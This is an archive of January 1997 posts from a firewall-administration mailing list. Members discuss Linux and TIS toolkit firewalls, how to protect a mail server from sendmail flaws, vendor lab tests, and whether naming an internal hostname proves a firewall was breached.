------------7AFB6A0836153-- From firewalls-owner Mon Jan 13 09:46:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06748 for firewalls-outgoing; Mon, 13 Jan 1997 08:26:00 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA06709 for ; Mon, 13 Jan 1997 08:25:45 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id KAA29663; Mon, 13 Jan 1997 10:35:30 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id KAA29368; Mon, 13 Jan 1997 10:25:04 -0600 Message-Id: <199701131625.KAA29368@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp029359; Mon Jan 13 10:24:56 1997 Date: Mon, 13 Jan 1997 10:24:00 -0600 From: "Hicks, Rick" Subject: RE: LINUX RedHat To: "'Firewalls List'" Cc: "'jmperez@sprynet.com'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I would appreciate hearing from anyone who has successfully installed a >PC-based >firewall in a LINUX RedHat environment. We have adopted LINUX RedHat for our >company and would prefer the TIS FW Toolkit or some other similar product, >although I know BSD OS is recommended most often. I recall reading an EMAIL >message on this forum sometime back about a person who charges $2,000 to >install >TIS FW Toolkit. Perhaps that person has had some experience with RedHat and >would like to share his/her knowledge as to what FW would best configure with >LINUX RedHat. I have been running a 'firewall' on Linux (RedHat) for almost a year now without any problems. I used parts of the TIS kit and other things: caching proxy, Real Audio proxy, scan detectors, Tripwire, etc.. However, I don't think the issue is whether I can run this correctly; its whether YOU can run this correctly. To be using the TIS toolkit you should know how to compile and configure programs yourself, and know about Internet security issues and how each piece of the firewall handles them. The kit was not intended, and is licensed accordingly, to be installed by people for money; it is intended to be a kit for security professionals to use and improve upon. If you feel comfortable with your security knowledge and compiling and configuring programs, then give the kit a try. If you are looking for someone to setup a firewall for you, you will need to purchase a commercial firewall. Rick ____________________________________________ Rick Hicks Network Specialist Hussmann Corporation RHicks@Hussmann.com http://www.hussmann.com From firewalls-owner Mon Jan 13 09:50:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06788 for firewalls-outgoing; Mon, 13 Jan 1997 08:26:37 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA06772 for ; Mon, 13 Jan 1997 08:26:22 -0800 (PST) Received: by smartwall.v-one.com; id LAA11440; Mon, 13 Jan 1997 11:26:10 -0500 (EST) Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma011420; Mon, 13 Jan 97 11:25:56 -0500 Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0144.D28AD8D0@nt_fs1.V-ONE.COM>; Mon, 13 Jan 1997 11:27:56 -0500 Message-ID: From: "Rowland, Craig H" To: "'rammeri@winternet.co.at'" , "'armin'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: Secure firewall with only Linux-Kernel filtering possible? Date: Mon, 13 Jan 1997 11:27:55 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >---------- >From: armin[SMTP:armin@data.tops.net] >Sent: Saturday, January 13, 1996 8:56 AM >To: rammeri@winternet.co.at >Cc: firewalls@GreatCircle.COM >Subject: Re: Secure firewall with only Linux-Kernel filtering possible? > > >additionally: > ... > >- sit down a minute and think 'bout sendmail =:) > (dont use < 8.8.4 ) ^^^^^^^^^ Well I agree with the first half :) I'd also set the firewall up to handle the incoming mail with SMAP as a front end. You can obtain the program from www.tis.com as part of the Firewall Tool Kit. >best regards >-armin > >> >> Assume the following situation: >> >> We are a company with 25 computer systems in a LAN, and with a 64k >> connection >> to the internet. >> >> So ... my question is ... is the following security-shema good or why >> not? >> >> Our LAN is divided into several parts, so we use 192.168.0.0 - >> 192.168.4.0 >> for our internet network. >> Between the router to the internet and the first local router, we have >> a firewall-setup with only the linux-kernel-filtering/masquerading. >> The firewall >> allows any connections to be made from the internal-net. But >> disallows any connection but a port 25 that will be forwarded to out >> mail-host in the internal net (even this connection is limited to our >> MX host). >> The firewall disallows incoming ftp-data. >> On the firewall there is NO daemon runnning, not even telnet for >> administration >> or sth. like this. >> ... >> Ok .. so tell me please, why is this setup insecure? >> >> thx, >> ingo >> -- Craig From firewalls-owner Mon Jan 13 11:13:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17459 for firewalls-outgoing; Mon, 13 Jan 1997 10:31:51 -0800 (PST) Received: from palrel1.hp.com (palrel1.hp.com [15.253.72.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA17430 for ; Mon, 13 Jan 1997 10:31:34 -0800 (PST) Received: from borg.mayfield.hp.com (borg.mayfield.hp.com [15.13.216.4]) by palrel1.hp.com with ESMTP (8.7.5/8.7.3) id KAA17088 for ; Mon, 13 Jan 1997 10:31:24 -0800 (PST) Message-Id: <199701131831.KAA17088@palrel1.hp.com> Received: by borg.mayfield.hp.com (1.39.111.2/16.2) id AA019559705; Mon, 13 Jan 1997 10:21:45 -0800 From: Frank Beall Subject: lab tests To: firewalls@GreatCircle.COM Date: Mon, 13 Jan 1997 10:21:45 PST X-Mailer: Elm [revision: 112.2] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If your evaluating firewalls check this article out from data communications. http://www.data.com/Lab_Tests/Firewalls.html From firewalls-owner Mon Jan 13 11:20:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA19365 for firewalls-outgoing; Mon, 13 Jan 1997 10:50:53 -0800 (PST) Received: from sfs01.winternet.co.at ([194.118.33.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA19257 for ; Mon, 13 Jan 1997 10:50:08 -0800 (PST) Received: from WINTERMUTE [194.118.13.135] (HELO winternet.co.at) by sfs01.winternet.co.at (AltaVista Mail V1.0/1.0 BL18 listener) id 0000_005e_32da_848a_9ffe; Mon, 13 Jan 1997 19:52:58 +0100 Received: from wintermute.w-inet.at (localhost [127.0.0.1]) by winternet.co.at (8.7.6/8.7.3) with ESMTP id CAA06124; Tue, 14 Jan 1997 02:47:05 +0100 Message-Id: <199701140147.CAA06124@winternet.co.at> X-Mailer: exmh version 2.0beta 12/23/96 Reply-to: rammeri@winternet.co.at X-IRCNick: KPanic X-IRCNet: EF-Net To: armin cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM Subject: Re: Secure firewall with only Linux-Kernel filtering possible? In-reply-to: Your message of "Sat, 13 Jan 1996 14:56:51 +0100." Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Tue, 14 Jan 1997 02:47:05 +0100 From: Ingo Rammer Sender: firewalls-owner@GreatCircle.COM Precedence: bulk at first i want to say a nice little thank you to the ones who answered my questions. but there's still a little question running around in the depths of my brain .. thats .. what are the advantages of, say altavista-firewall or fw-1 compared to a linux box ... as i know the i/o system of a sun f.e. is worse than the linux's.... so ....is it because of *) greater security? *) greater flexibility? *) graphic setup? *) throuput? *) having someone to blame, if it doesn't work? > - sit down a minute and think 'bout sendmail =:) > (dont use < 8.8.4 ) we use a nt box for mail-handling, with altavista-mail server because some guys here really need some bells-and-whistles-graphics for user-setup :( but anyway .. i hope it is fairly secure ,) thx, ingo -- ---------------------------------------------------------------------- No need to turn out the light | Email: rammeri@winternet.co.at you feel so depressed inside | SMS: +436643552547@text.mobilkom.at when you think of all your | Phone: +43-664-3552547 wasted years at night | +43-7253-7697 ---------------------------------------------------------------------- From firewalls-owner Mon Jan 13 11:30:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20657 for firewalls-outgoing; Mon, 13 Jan 1997 11:08:37 -0800 (PST) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA20619 for ; Mon, 13 Jan 1997 11:08:11 -0800 (PST) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id LAA26545 for ; Mon, 13 Jan 1997 11:10:05 -0800 (PST) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA07524; Mon, 13 Jan 97 11:07:45 PST Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id LAA00453 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 13 Jan 1997 11:07:32 -0800 (PST) Message-Id: <199701131907.LAA00453@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 3402B67653FCEFC58825641E0069123E; Mon, 13 Jan 97 11:07:26 EDT To: rammeri Cc: firewalls From: Ryan Russell/SYBASE Date: 13 Jan 97 11:12:27 EDT Subject: Re: Secure firewall with only Linux-Kernel filtering possible? X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How about if someone hacks port 25 via one of the seemingly endless mail bugs (are you using sendmail?) so that they now have control of a machine on your internal net? FWIW, I don't know of a good solution to this, short of being religious about keeping your mail demon updated and secure. Even if you have a mail server on the outside or on a DMZ which forwards to a mail server on the inside, it's just another hop. I suppose that would make it somewhat more difficult. Ryan ---------- Previous Message ---------- To: firewalls cc: From: rammeri @ winternet.co.at @ smtp Date: 01/13/97 05:55:18 PM Subject: Secure firewall with only Linux-Kernel filtering possible? Assume the following situation: We are a company with 25 computer systems in a LAN, and with a 64k connection to the internet. So ... my question is ... is the following security-shema good or why not? Our LAN is divided into several parts, so we use 192.168.0.0 - 192.168.4.0 for our internet network. Between the router to the internet and the first local router, we have a firewall-setup with only the linux-kernel-filtering/masquerading. The firewall allows any connections to be made from the internal-net. But disallows any connection but a port 25 that will be forwarded to out mail-host in the internal net (even this connection is limited to our MX host). The firewall disallows incoming ftp-data. On the firewall there is NO daemon runnning, not even telnet for administration or sth. like this. ... Ok .. so tell me please, why is this setup insecure? thx, ingo -- ---------------------------------------------------------------------- No need to turn out the light | Email: rammeri@winternet.co.at you feel so depressed inside | SMS: +436643552547@text.mobilkom.at when you think of all your | Phone: +43-664-3552547 wasted years at night | +43-7253-7697 ---------------------------------------------------------------------- From firewalls-owner Mon Jan 13 12:42:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24766 for firewalls-outgoing; Mon, 13 Jan 1997 12:07:03 -0800 (PST) Received: from ereapp.erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA24714 for ; Mon, 13 Jan 1997 12:06:38 -0800 (PST) Received: (from smap@localhost) by ereapp.erenj.com (8.8.3/8.8.3) id PAA02539; Mon, 13 Jan 1997 15:03:19 -0500 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma002516; Mon Jan 13 15:02:50 1997 Received: from stargate.erenj.com (stargate.erenj.com [159.70.1.8]) by eredns.erenj.com (8.7.4/8.7.3) with SMTP id PAA26802; Mon, 13 Jan 1997 15:02:49 -0500 Received: from stargate.erenj.com by stargate.erenj.com; (5.65v3.2/1.1.8.2/12Feb96-1009AM/bdboyle@erenj.com) id AA17377; Mon, 13 Jan 1997 15:02:48 -0500 Message-Id: <32DA94E8.1CFB@erenj.com> Date: Mon, 13 Jan 1997 15:02:48 -0500 From: "Bryan D. Boyle" Organization: Exxon Research and Engineering Co. X-Mailer: Mozilla 3.0C-NSCP (X11; I; OSF1 V4.0 alpha) Mime-Version: 1.0 To: Frank Beall Cc: firewalls@GreatCircle.COM Subject: Re: lab tests References: <199701131831.KAA17088@palrel1.hp.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Beall wrote: > > If your evaluating firewalls check this article out from data communications. > http://www.data.com/Lab_Tests/Firewalls.html Be aware that this test is over a year old from publication, which means the tests were done in sept 95 probably. In this industry, this may as well be a performance test of an IMS 8000 running TurboDOS. -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "They that can give up liberty to obtain a little temporary safety deserve neither liberty nor safety." - Benjamin Franklin, Historical Review of Pennsylvania From firewalls-owner Mon Jan 13 12:44:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA27248 for firewalls-outgoing; Mon, 13 Jan 1997 12:35:38 -0800 (PST) Received: from mil-exch-1.mildenhall.af.mil ([132.19.156.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA27237 for ; Mon, 13 Jan 1997 12:35:27 -0800 (PST) Received: by mil-exch-1.mildenhall.af.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0191.2CB89030@mil-exch-1.mildenhall.af.mil>; Mon, 13 Jan 1997 20:34:29 -0000 Message-ID: From: Neuman Dave SSgt 100CS/SCBBN To: "'firewalls@greatcircle.com'" , "'Christopher Tighe'" Subject: RE: tcp port 5510 Date: Mon, 13 Jan 1997 20:34:27 -0000 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Practical Unix & Internet Security (Garfinkel& Spafford, Apr 1996, p.934) 5510 is used by a protocol called "securidprop" described as "Security Dynamics ACE/Server slave." Cheers! Dave ... Dave Neuman, SSgt, 100CS/SCBBN Network Security Manager RAF Mildenhall, UK DSN Phone: 314-238-3860 CMCL Phone: +44-1638-543860 DSN Fax: 314-238-2504 CMCL Fax: +44-1638-542504 mailto:dave.neuman@mildenhall.af.mil >---------- >From: Christopher Tighe[SMTP:ctighe@dat.tds.de] >Sent: Monday, January 13, 1997 3:41 PM >To: firewalls@greatcircle.com >Subject: tcp port 5510 > >Hi > > does anyone know what tcp port 5510 is used for, or >where I can find it out? - it is not listed in rfc 1700. > >cheers >chris >-- >+------------------------------------------------------------+ >| Christopher Tighe BSc. CCIE. Tel: ++49 (0)7131 6235-119 | >| Network Services Fax: ++49 (0)7131 6235-115 | >| tele-daten service GmbH E-Mail: ctighe@tds.de | >| Titotstr. 7-9 | >| 74072 Heilbronn \"""/ | >| Germany (o o) | >+------------------------------------.ooO(_)Ooo.-------------+ > From firewalls-owner Mon Jan 13 12:59:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24481 for firewalls-outgoing; Mon, 13 Jan 1997 12:03:32 -0800 (PST) Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA24455 for ; Mon, 13 Jan 1997 12:03:13 -0800 (PST) Received: by gate.ups.com id AA01975 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Mon, 13 Jan 1997 15:02:53 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Mon, 13 Jan 1997 15:02:53 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Mon, 13 Jan 1997 15:02:53 -0500 Date: Mon, 13 Jan 1997 15:02:50 -0500 (EST) From: Dave Wreski X-Sender: tel1dvw@butthead To: firewalls@greatcircle.com Subject: SUMMARY: Restricting port access Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. I just wanted to drop a quick thanks to those that replied to my question. The information was very helpful. Most people simply said to block individual ports to prevent some networks services (NFS, NIS+) from being used outside the network. Some said that it is the best defense against port guessing attacks, and changes in software programs that all-of-the-sudden have services on ports where there wasn't before. "Daniel J Blander" mentioned: By controlling ports, you are more likely to notice attacks against your site. Inherent to most port controlling software/systems is a logging facility that permits you to begin identifying attacks and attack patterns. While this seems not terribly effectual as a protection in and of itself, it is invaluable in protecting yourself against potential future threats. IP Spoofing was also mentioned. Ryan Russell mentioned that "It's really a matter of a trust relationship. Generally, it's best to have the minimum amount of trust you need to get the job done. " Again, I appreciate all your comments, and hope I can provide some valueable input one day... Dave ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." ----------------------------------------------------------------------- echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc From firewalls-owner Mon Jan 13 13:20:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA29895 for firewalls-outgoing; Mon, 13 Jan 1997 13:07:53 -0800 (PST) Received: from cypress.cycon.com (cypress.CYCON.COM [198.202.237.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA29832 for ; Mon, 13 Jan 1997 13:07:29 -0800 (PST) Received: from localhost (carlson@localhost) by cypress.cycon.com (8.7.5/8.7.3) with SMTP id QAA02694 for ; Mon, 13 Jan 1997 16:09:48 -0500 Date: Mon, 13 Jan 1997 16:09:46 -0500 (EST) From: Chris Carlson To: firewalls@GreatCircle.COM Subject: Re: lab tests In-Reply-To: <199701131831.KAA17088@palrel1.hp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 13 Jan 1997, Frank Beall wrote: > If your evaluating firewalls check this article out from data communications. > http://www.data.com/Lab_Tests/Firewalls.html > As with any test, a few of the firewall vendors that were tested (November 21, 1995) have expressed problems with the testing methodology. Refer to issues following the test for company and editorial replies. DataComm is performing a new set of testing to be released sometime in March 1997. Check their editorial calendar for the exact issue. Chris -- --------------------------------------------------------------------- Chris Carlson http://www.cycon.com CYCON Technologies info@cycon.com carlson@cycon.com (703) 383-0247 CYCON Labyrinth Firewall - Stateful Inspection & Address Translation --------------------------------------------------------------------- From firewalls-owner Mon Jan 13 13:51:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA29750 for firewalls-outgoing; Mon, 13 Jan 1997 13:06:28 -0800 (PST) Received: from xyzzy.plugh.edmonton.ab.ca (xyzzy.plugh.edmonton.ab.ca [198.161.22.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA29710 for ; Mon, 13 Jan 1997 13:06:09 -0800 (PST) Received: (from uucp@localhost) by xyzzy.plugh.edmonton.ab.ca (8.6.12/8.6.9) id OAA03688; Mon, 13 Jan 1997 14:05:50 -0700 Received: from snouts-gw.obtuse.com(192.168.30.61), claiming to be "snouts.obtuse.com" via SMTP by mailhost.plugh.edmonton.ab.ca, id smtpd03686aaa; Mon Jan 13 14:05:45 1997 Received: (from beck@localhost) by snouts.obtuse.com (8.7.5/8.7.3) id OAA08826; Mon, 13 Jan 1997 14:06:30 -0700 From: Bob Beck Message-Id: <199701132106.OAA08826@snouts.obtuse.com> Subject: Re: Secure firewall with only Linux-Kernel filtering possible? To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE) Date: Mon, 13 Jan 1997 14:06:29 -0700 (MST) Cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM In-Reply-To: <199701131907.LAA00453@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jan 13, 97 11:12:27 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > How about if someone hacks port 25 via > one of the seemingly endless mail bugs (are > you using sendmail?) so that they now have > control of a machine on your internal net? > > FWIW, I don't know of a good solution to this, > short of being religious about keeping your > mail demon updated and secure. Even if you > have a mail server on the outside or on a DMZ > which forwards to a mail server on the inside, > it's just another hop. I suppose that would make > it somewhat more difficult. > No, it's not just another hop. most of the endless sendmail holes (And don't kid yourself, other mailer have 'em too) and just "keeping current" doesn't help. I know lots of admins that "keep current" and are still often one release behind sendmail. That's usually all it takes :-) Howver, most mailer problems due to one of two circimstances: 1) The intruder talking directly to a large unverified privileged program (i.e. sendmail) 2) The large previledged program that is setuid being invoked by normal users in a manner to gain access to root. From a firewall point of view the second is less troublesome, since you presumably trust your lusers or keep them off the mailserver. (or don't run sendmail setuid root, etc. etc.) It's 1) that you're worried about. The simple answer is to run something like Obtuse smtpd(ftp://ftp.obtuse.com/smtpd) or TIS smap/smapd (wherever TIS is sold in your neighborhood) on a bastion host that passes your mail in/out from your mail server(s) that are inside. You have now significantly reduced the risk of a mail daemon compromise. (sendmail or otherwise.) (People can still mail your users evil things and ask them to run them somehow, but that's another ball of wax). Either of those should run fine on your linux firewall. smtpd is free too. -Bob -- Bob Beck Obtuse Systems Corporation beck@obtuse.com http://www.obtuse.com/ True Evil hides its real intentions in its street address. Search and you shall find it, and the truth shall set you free. From firewalls-owner Mon Jan 13 14:29:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA28865 for firewalls-outgoing; Mon, 13 Jan 1997 12:57:06 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA28838 for ; Mon, 13 Jan 1997 12:56:47 -0800 (PST) Received: by hidata.com; id AA19120; Mon, 13 Jan 97 12:56:38 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma019118; Mon, 13 Jan 97 12:56:25 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0151.10014A30@oscntsrv.hidata.com>; Mon, 13 Jan 1997 12:55:33 -0800 Message-Id: From: "Stout, Bill" To: "'firewalls@GreatCircle.COM'" Subject: RE: Newbie Q's & Class 3 Firewalls? Date: Mon, 13 Jan 1997 12:55:32 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 10, 1997 12:36 PM, John Cross[SMTP:jcross@grtk.com] wrote: > I'm currently trying to find a replacement for our TIS firewall running on a > BSD box. I've asked for product info on the following: > Guardian > OnGuard > CheckPoint > Eagle NT I'm planning on running the system on an NT pentium box. Why, pray tell, would you want to do that? You must be using the fwtk, Gauntlet is one of the best firewalls out there, and only a bad experience would make one replace it. Also, moving to an NT based firewall does not give you all capabilites of a UNIX version of that same firewall. Unless things have recently changed, vendors do not have all features available on the NT version as they do on their (higher-end) UNIX versions. I refrain from saying additional things about NT security, since that would restart lengthy old threads... Bill Stou From firewalls-owner Mon Jan 13 14:55:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05295 for firewalls-outgoing; Mon, 13 Jan 1997 13:56:00 -0800 (PST) Received: from emout09.mail.aol.com (emout09.mx.aol.com [198.81.11.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA05222 for ; Mon, 13 Jan 1997 13:55:37 -0800 (PST) From: ACDS@aol.com Received: (from root@localhost) by emout09.mail.aol.com (8.7.6/8.7.3/AOL-2.0.0) id QAA25992 for firewalls@greatcircle.com; Mon, 13 Jan 1997 16:55:18 -0500 (EST) Date: Mon, 13 Jan 1997 16:55:18 -0500 (EST) Message-ID: <970113161426_1690827825@emout09.mail.aol.com> To: firewalls@greatcircle.com Subject: RE: Outlink updates "The Firewall Report" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone seen this report? Is it really worth almost a thousand dollars? Are these people related to NCSA or any of the vendors in any way? >>Outlink, Inc., an information technology market research firm, has updated "The Firewall Report" publication. Outlink is now selling the report with profiles of Trusted Information System's Gauntlet 3.2, Secure Computing's Sidewinder 3.0, Secure Computing's BorderWare Firewall Server 4.0 and Milkyway Networks' Black Hole 3.0 version. Outlink's research profiles 20 leading firewall solutions and suppliers. Priced at $995, "The Firewall Report" contains profiles of 20 leading products and their suppliers. Each profile is approximately 60 to 80 pages in length with detailed research. << From firewalls-owner Mon Jan 13 14:59:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA08304 for firewalls-outgoing; Mon, 13 Jan 1997 14:31:26 -0800 (PST) Received: from geocities.com ([204.7.246.133]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA08296 for ; Mon, 13 Jan 1997 14:31:11 -0800 (PST) Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA18478; Mon, 13 Jan 1997 14:18:02 -0800 (PST) Message-Id: <199701132218.OAA18478@geocities.com> From: "Gabriel Dura" To: "Gene Lee" Cc: Subject: Re: FW-1 hacked? - Reply Date: Mon, 13 Jan 1997 23:57:22 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please take a look at my answer to Timothy L. Hermans ---------- > From: Gene Lee > To: mike ; 'Gabriel Dura' > Cc: firewalls@GreatCircle.COM > Subject: RE: FW-1 hacked? - Reply > Date: luni, ianuarie 13, 1997 09:39 > On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote: > >There is a guy, working on his own, who claims he knows how to penetrate >FBI's firewall. >As a proof I was told that behind the firewall there is there is another >computer 'phi.fbi.gov'. Just because you can name a hostname behind the firewall is no proof of penetration. A good example is in a "polite" SMTP (also NNTP) transaction, say through a SOCKS server, the host sending the message also sends it's hostname, which means that that the e-mail has an internal hostname in it's header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker). If I were you, I'd ask for a bit more proof than a flimsy internal hostname... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Mon Jan 13 15:03:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA08461 for firewalls-outgoing; Mon, 13 Jan 1997 14:33:42 -0800 (PST) Received: from geocities.com (mail2.geocities.com [204.7.246.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA08452 for ; Mon, 13 Jan 1997 14:33:19 -0800 (PST) Received: from 193.230.255.2.flex.ro (vdehelean@dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA09261; Mon, 13 Jan 1997 14:32:08 -0800 (PST) Message-Id: <199701132232.OAA09261@geocities.com> From: "Gabriel Dura" To: "Gene Lee" Cc: Subject: Re: FW-1 hacked? - Reply Date: Mon, 13 Jan 1997 23:57:22 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please take a look at my answer to Timothy L. Hermans ---------- > From: Gene Lee > To: mike ; 'Gabriel Dura' > Cc: firewalls@GreatCircle.COM > Subject: RE: FW-1 hacked? - Reply > Date: luni, ianuarie 13, 1997 09:39 > On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote: > >There is a guy, working on his own, who claims he knows how to penetrate >FBI's firewall. >As a proof I was told that behind the firewall there is there is another >computer 'phi.fbi.gov'. Just because you can name a hostname behind the firewall is no proof of penetration. A good example is in a "polite" SMTP (also NNTP) transaction, say through a SOCKS server, the host sending the message also sends it's hostname, which means that that the e-mail has an internal hostname in it's header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker). If I were you, I'd ask for a bit more proof than a flimsy internal hostname... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Mon Jan 13 15:07:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA07383 for firewalls-outgoing; Mon, 13 Jan 1997 14:20:56 -0800 (PST) Received: from geocities.com ([204.7.246.133]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA07358 for ; Mon, 13 Jan 1997 14:20:33 -0800 (PST) Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id OAA14762; Mon, 13 Jan 1997 14:08:47 -0800 (PST) Message-Id: <199701132208.OAA14762@geocities.com> From: "Gabriel Dura" To: "Gene Lee" Cc: Subject: Re: FW-1 hacked? - Reply Date: Mon, 13 Jan 1997 23:57:22 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please take a look at my answer to Timothy L. Hermans ---------- > From: Gene Lee > To: mike ; 'Gabriel Dura' > Cc: 